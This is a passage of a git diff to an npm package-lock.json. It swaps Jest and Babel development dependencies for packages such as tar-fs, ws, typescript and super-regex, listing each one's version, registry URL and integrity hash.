"node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, + "node_modules/super-regex": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/super-regex/-/super-regex-0.2.0.tgz", + "integrity": "sha512-WZzIx3rC1CvbMDloLsVw0lkZVKJWbrkJ0k1ghKFmcnPrW1+jWbgTkTEWVtD9lMdmI4jZEz40+naBxl1dCUhXXw==", + "license": "MIT", "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" + "clone-regexp": "^3.0.0", + "function-timeout": "^0.1.0", + "time-span": "^5.1.0" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" + "node": ">=14.16" }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, + "node_modules/tar-fs": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.1.0.tgz", + "integrity": "sha512-5Mty5y/sOF1YWj1J6GiBodjlDc05CUR8PKXrsnFAiSG0xA+GHeWLovaZPYUDXkH/1iKRf2+M5+OrRgzC7O9b7w==", + "license": "MIT", "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "license": "MIT", "dependencies": { - "tweetnacl": "^0.14.3" + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" } }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "license": "Apache-2.0", "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" + "b4a": "^1.6.4" } }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, + "node_modules/time-span": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/time-span/-/time-span-5.1.0.tgz", + "integrity": "sha512-75voc/9G4rDIJleOo4jPvN4/YC4GRZrY8yy1uU4lwrB3XEQbWve8zXoO5No4eFrGcTAMYyoY67p8jRQdtA1HbA==", + "license": "MIT", "dependencies": { - "fill-range": "^7.1.1" + "convert-hrtime": "^5.0.0" }, "engines": { - "node": ">=8" + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "node_modules/typescript": { + "version": "5.8.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.3.tgz", + "integrity": "sha512-p1diW6TqL9L07nNxvRMM7hMMw4c5XOo/1ibL4aAIGmSAt9slTE1Xgw5KWuof2uTOvCg9BY7ZRi+GaF+7sfgPeQ==", "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, + "license": "Apache-2.0", "bin": { - "browserslist": "cli.js" + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" }, "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + "node": ">=14.17" } }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" } }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { + "node_modules/wrappy": { "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "license": "ISC" }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dependencies": { - "assert-plus": "^1.0.0" - }, + "node_modules/ws": { + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", + "license": "MIT", "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" + "node": ">=10.0.0" }, - "engines": { - "node": ">=6.0" + "peerDependencies": { + "bufferutil": "^4.0.1", + "utf-8-validate": ">=5.0.2" }, "peerDependenciesMeta": { - "supports-color": { + "bufferutil": { + "optional": true + }, + "utf-8-validate": { "optional": true } } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/ecc-jsbn/node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "node_modules/electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + } + }, + "dependencies": { + "@esbuild/aix-ppc64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.5.tgz", + "integrity": "sha512-9o3TMmpmftaCMepOdA5k/yDw8SfInyzWWTjYTFCX3kPSDJMROQTb8jg+h9Cnwnmm1vOzvxN7gIfB5V2ewpjtGA==", "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } + "optional": true }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "@esbuild/android-arm": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.5.tgz", + "integrity": 